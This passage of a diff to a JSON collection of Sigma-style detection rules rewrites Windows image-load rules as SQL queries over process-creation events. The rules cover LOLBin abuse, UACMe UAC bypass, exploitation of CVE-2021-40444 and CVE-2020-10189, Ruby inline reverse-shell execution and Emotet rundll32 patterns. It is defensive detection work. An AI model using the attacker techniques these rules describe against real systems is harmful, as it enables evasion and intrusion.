Program Compatibility Wizard", + "id": "b97cd4b1-30b8-4a9d-bd72-6293928d52bc", + "status": "test", + "description": "Detect indirect command execution via Program Compatibility Assistant pcwrun.exe", + "author": "A. Sungurov , oscd.community", + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.execution" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts", + "Legit usage of scripts" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\dsparse.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\pcwrun.exe' ESCAPE '\\')" ], - "filename": "image_load_office_dsparse_dll_load.yml" + "filename": "proc_creation_win_lolbin_pcwrun.yml" }, { - "title": "Microsoft VBA For Outlook Addin Loaded Via Outlook", - "id": "9a0b8719-cd3c-4f0a-90de-765a4cb3f5ed", + "title": "Change Default File Association Via Assoc", + "id": "3d3aa6cd-6272-44d6-8afc-7e88dfef7061", "status": "test", - "description": "Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects file association changes using the builtin \"assoc\" command.\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. 
File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.persistence", + "attack.t1546.001" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Admin activity" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND ImageLoaded LIKE '\\\\outlvba.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%assoc%' ESCAPE '\\')" ], - "filename": "image_load_office_outlook_outlvba_load.yml" + "filename": "proc_creation_win_cmd_assoc_execution.yml" }, { - "title": "System Drawing DLL Load", - "id": "666ecfc7-229d-42b8-821e-1a8f8cb7057c", - "status": "experimental", - "description": "Detects processes loading \"System.Drawing.ni.dll\". 
This could be an indicator of potential Screen Capture.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Potential CVE-2021-40444 Exploitation Attempt", + "id": "894397c6-da03-425c-a589-3d09e7d1f750", + "status": "test", + "description": "Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations", + "author": "Florian Roth (Nextron Systems), @neonprimetime", "tags": [ - "attack.collection", - "attack.t1113" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "False positives are very common from system and third party applications, activity needs to be investigated. This rule is best correlated with other events to increase the level of suspiciousness" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\System.Drawing.ni.dll' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\excel.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\control.exe input.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\control.exe\" input.dll' ESCAPE '\\')))" ], - "filename": "image_load_dll_system_drawing_load.yml" + "filename": "proc_creation_win_exploit_cve_2021_40444.yml" }, { - "title": "CLR DLL Loaded Via Office Applications", - "id": "d13c43f0-f66b-4279-8b2c-5912077c1780", - "status": "test", - "description": "Detects CLR DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Suspicious Diantz Download and Compress Into a CAB File", + "id": "185d7418-f250-42d0-b72e-0c8b70661e93", + "status": "experimental", + "description": "Download and compress a remote file and store it in a cab file on local machine.", + "author": "frack113", "tags": [ - 
"attack.execution", - "attack.t1204.002" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\clr.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%diantz.exe%' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\')" ], - "filename": "image_load_office_dotnet_clr_dll_load.yml" + "filename": "proc_creation_win_lolbin_diantz_remote_cab.yml" }, { - "title": "GAC DLL Loaded Via Office Applications", - "id": "90217a70-13fc-48e4-b3db-0d836c5824ac", + "title": "Exploited CVE-2020-10189 Zoho ManageEngine", + "id": "846b866e-2a57-46ee-8e16-85fa92759be7", "status": "test", - "description": "Detects any GAC DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "description": "Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.initial_access", + "attack.t1190", "attack.execution", - "attack.t1204.002" + "attack.t1059.001", + "attack.t1059.003", + "attack.s0190", + "cve.2020.10189" ], "falsepositives": [ - "Legitimate macro usage. 
Add the appropriate filter according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\assembly\\\\GAC\\_MSIL%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%DesktopCentral\\_Server\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\'))" ], - "filename": "image_load_office_dotnet_gac_dll_load.yml" + "filename": "proc_creation_win_exploit_cve_2020_10189.yml" }, { - "title": "Potential DCOM InternetExplorer.Application DLL Hijack - Image Load", - "id": "f354eba5-623b-450f-b073-0b5b2773b6aa", + "title": "Potential Configuration And Service Reconnaissance Via Reg.EXE", + "id": "970007b7-ce32-49d0-a4a4-fbef016950bd", "status": "test", - "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", + "description": "Detects the usage of \"reg.exe\" in order to query reconnaissance information from the registry. 
Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software.", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" + "attack.discovery", + "attack.t1012", + "attack.t1007" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%query%' ESCAPE '\\' AND (CommandLine LIKE '%currentVersion\\\\windows%' ESCAPE '\\' OR CommandLine LIKE '%winlogon\\\\%' ESCAPE '\\' OR CommandLine LIKE '%currentVersion\\\\shellServiceObjectDelayLoad%' ESCAPE '\\' OR CommandLine LIKE '%currentVersion\\\\run%' ESCAPE '\\' OR CommandLine LIKE '%currentVersion\\\\policies\\\\explorer\\\\run%' ESCAPE '\\' OR CommandLine LIKE '%currentcontrolset\\\\services%' ESCAPE '\\'))" ], - "filename": "image_load_dcom_iertutil_dll_hijack.yml" + "filename": "proc_creation_win_reg_query_registry.yml" }, { - "title": "UAC Bypass With Fake DLL", - "id": "a5ea83a7-05a5-44c1-be2e-addccbbd8c03", - "status": "test", - "description": "Attempts to load dismcore.dll after dropping it", - "author": "oscd.community, Dmitry Uchakin", + "title": "HackTool - UACMe Akagi Execution", + "id": "d38d2fa4-98e6-4a24-aff1-410b0c9ad177", + "status": "experimental", + "description": "Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata", + "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1574.002" + 
"attack.t1548.002" ], "falsepositives": [ - "Actions of a legitimate telnet client" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\dism.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\Dism\\\\dismcore.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'UACMe' OR Company IN ('REvol Corp', 'APT 92', 'UG North', 'Hazardous Environments', 'CD Project Rekt') OR Description IN ('UACMe main module', 'Pentesting utility') OR OriginalFileName IN ('Akagi.exe', 'Akagi64.exe') OR (NewProcessName LIKE '%\\\\Akagi64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Akagi.exe' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\') OR Imphash IN ('767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b')))" ], - "filename": 
"image_load_uac_bypass_via_dism.yml" + "filename": "proc_creation_win_hktl_uacme.yml" }, { - "title": "Potential DLL Sideloading Via JsSchHlp", - "id": "68654bf0-4412-43d5-bfe8-5eaa393cd939", + "title": "Ruby Inline Command Execution", + "id": "20a5ffa1-3848-4584-b6f8-c7c7fd9f69c8", "status": "experimental", - "description": "Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor", - "author": "frack113", + "description": "Detects execution of ruby using the \"-e\" flag. This is could be used as a way to launch a reverse shell or execute live ruby code.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\JSESPR.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\Common Files\\\\Justsystem\\\\JsSchHlp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ruby.exe' ESCAPE '\\' OR OriginalFileName = 'ruby.exe') AND CommandLine LIKE '% -e%' ESCAPE '\\')" ], - "filename": "image_load_side_load_jsschhlp.yml" + "filename": "proc_creation_win_ruby_inline_command_execution.yml" }, { - "title": "Fax Service DLL Search Order Hijack", - "id": "828af599-4c53-4ed2-ba4a-a9f835c434ea", - "status": "test", - "description": "The Fax service attempts to load ualapi.dll, which is non-existent. 
An attacker can then (side)load their own malicious DLL using this service.", - "author": "NVISO", + "title": "Suspicious Schtasks Schedule Type With High Privileges", + "id": "7a02e22e-b885-4404-b38b-1ddc7e65258a", + "status": "experimental", + "description": "Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1574.001", - "attack.t1574.002" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Unlikely" + "Some installers were seen using this method of creation unfortunately. Filter them in your environment" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\fxssvc.exe' ESCAPE '\\' AND ImageLoaded LIKE '%ualapi.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '% ONLOGON %' ESCAPE '\\' OR CommandLine LIKE '% ONSTART %' ESCAPE '\\' OR CommandLine LIKE '% ONCE %' ESCAPE '\\' OR CommandLine LIKE '% ONIDLE %' ESCAPE '\\') AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%HIGHEST%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_ualapi.yml" + "filename": "proc_creation_win_schtasks_schedule_type_system.yml" }, { - "title": "Microsoft Office DLL Sideload", - "id": "829a3bdf-34da-4051-9cf4-8ed221a8ae4f", + "title": "Modify Group Policy Settings", + "id": "ada4b0c4-758b-46ac-9033-9004613a150d", "status": "experimental", - "description": "Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and 
research)", + "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.persistence", "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1484.001" ], "falsepositives": [ - "Unlikely" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\outllib.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System%' ESCAPE '\\' AND (CommandLine LIKE '%GroupPolicyRefreshTimeDC%' ESCAPE '\\' OR CommandLine LIKE '%GroupPolicyRefreshTimeOffsetDC%' ESCAPE '\\' OR CommandLine LIKE '%GroupPolicyRefreshTime%' ESCAPE '\\' OR CommandLine LIKE '%GroupPolicyRefreshTimeOffset%' ESCAPE '\\' OR CommandLine LIKE '%EnableSmartScreen%' ESCAPE '\\' OR CommandLine LIKE '%ShellSmartScreenLevel%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_office_dlls.yml" + "filename": "proc_creation_win_reg_modify_group_policy_settings.yml" }, { - "title": "PowerShell Core DLL Loaded By Non PowerShell Process", - "id": "092bc4b9-3d1d-43b4-a6b4-8c8acd83522f", - "status": "experimental", - "description": "Detects loading of essential DLLs used by PowerShell, but not by the process powershell.exe. 
Detects behaviour similar to meterpreter's \"load powershell\" extension.", - "author": "Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton", + "title": "Whoami Utility Execution", + "id": "e28a5a99-da44-436d-b7a0-2afc20a5f413", + "status": "test", + "description": "Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1059.001", - "attack.execution" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Used by some .NET binaries, minimal on user workstation.", - "Used by Microsoft SQL Server Management Studio" + "Admin activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\System.Management.Automation.Dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\System.Management.Automation.ni.Dll' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\dsac.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINDOWS\\\\System32\\\\sdiagnhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINDOWS\\\\System32\\\\RemoteFXvGPUDisablement.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlps.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winrshost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\syncappvpublishingserver.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\runscripthelper.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ServerManager.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SQL Server Management Studio %\\\\Common%\\\\IDE\\\\Ssms.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\IDE\\\\devenv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ServiceHub.VSDetouredHost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ServiceHub.SettingsHost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ServiceHub.Host.CLR.x86.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Citrix\\\\ConfigSync\\\\ConfigSyncRun.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor.exe' ESCAPE '\\')) OR (NewProcessName = '')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe'))" ], - "filename": "image_load_dll_system_management_automation_susp_load.yml" + "filename": "proc_creation_win_whoami_execution.yml" }, { - "title": "Suspicious Volume Shadow Copy Vsstrace.dll Load", - "id": "48bfd177-7cf2-412b-ad77-baf923489e82", + "title": "Suspicious Rundll32 Without Any CommandLine Params", + "id": "1775e15e-b61b-4d14-a1a3-80981298085a", "status": "experimental", - "description": "Detects the image load of VSS DLL by uncommon executables", - "author": "frack113", + "description": "Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.t1202" ], "falsepositives": [ - "Unknown" + "Possible but rare" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' 
ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NOT ((ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\'))))" ], - "filename": "image_load_dll_vsstrace_susp_load.yml" + "filename": "proc_creation_win_rundll32_no_params.yml" }, { - "title": "Potential DLL Sideloading Via ClassicExplorer32.dll", - "id": "caa02837-f659-466f-bca6-48bde2826ab4", + "title": "Fsutil Drive Enumeration", + "id": "63de06b9-a385-40b5-8b32-73f2b9ef84b6", "status": "experimental", - "description": "Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software", - "author": "frack113", + "description": "Attackers may leverage fsutil to enumerated connected drives.", + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.discovery", + "attack.t1120" ], "falsepositives": [ - "Unknown" + "Certain software or administrative tasks may trigger false positives." 
], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\ClassicExplorer32.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\Classic Shell\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND CommandLine LIKE '%drives%' ESCAPE '\\')" ], - "filename": "image_load_side_load_classicexplorer32.yml" + "filename": "proc_creation_win_fsutil_drive_enumeration.yml" }, { - "title": "Pingback Backdoor DLL Loading Activity", - "id": "35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b", - "status": "experimental", - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "author": "Bhabesh Raj", + "title": "Potential Emotet Rundll32 Execution", + "id": "54e57ce3-0672-46eb-a402-2c0948d5e3e9", + "status": "test", + "description": "Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL", + "author": "FPT.EagleEye", "tags": [ - "attack.persistence", - "attack.t1574.001" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msdtc.exe' ESCAPE '\\' AND ImageLoaded LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,RunDLL' ESCAPE '\\' OR CommandLine LIKE '%,Control\\_RunDLL' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%.dll,Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll\",Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll'',Control\\_RunDLL' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\tracker.exe' ESCAPE '\\')))" 
], - "filename": "image_load_malware_pingback_backdoor.yml" + "filename": "proc_creation_win_malware_emotet_rundll32_execution.yml" }, { - "title": "Amsi.DLL Load By Uncommon Process", - "id": "facd1549-e416-48e0-b8c4-41d7215eedc8", - "status": "experimental", - "description": "Detects loading of Amsi.dll by uncommon processes", - "author": "frack113", + "title": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl", + "id": "074e0ded-6ced-4ebd-8b4d-53f55908119d", + "status": "test", + "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", + "author": "Julia Fomina, oscd.community", "tags": [ "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.t1216" ], "falsepositives": [ - "Likely" + "Unlikely" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\amsi.dll' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\ngentask.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine 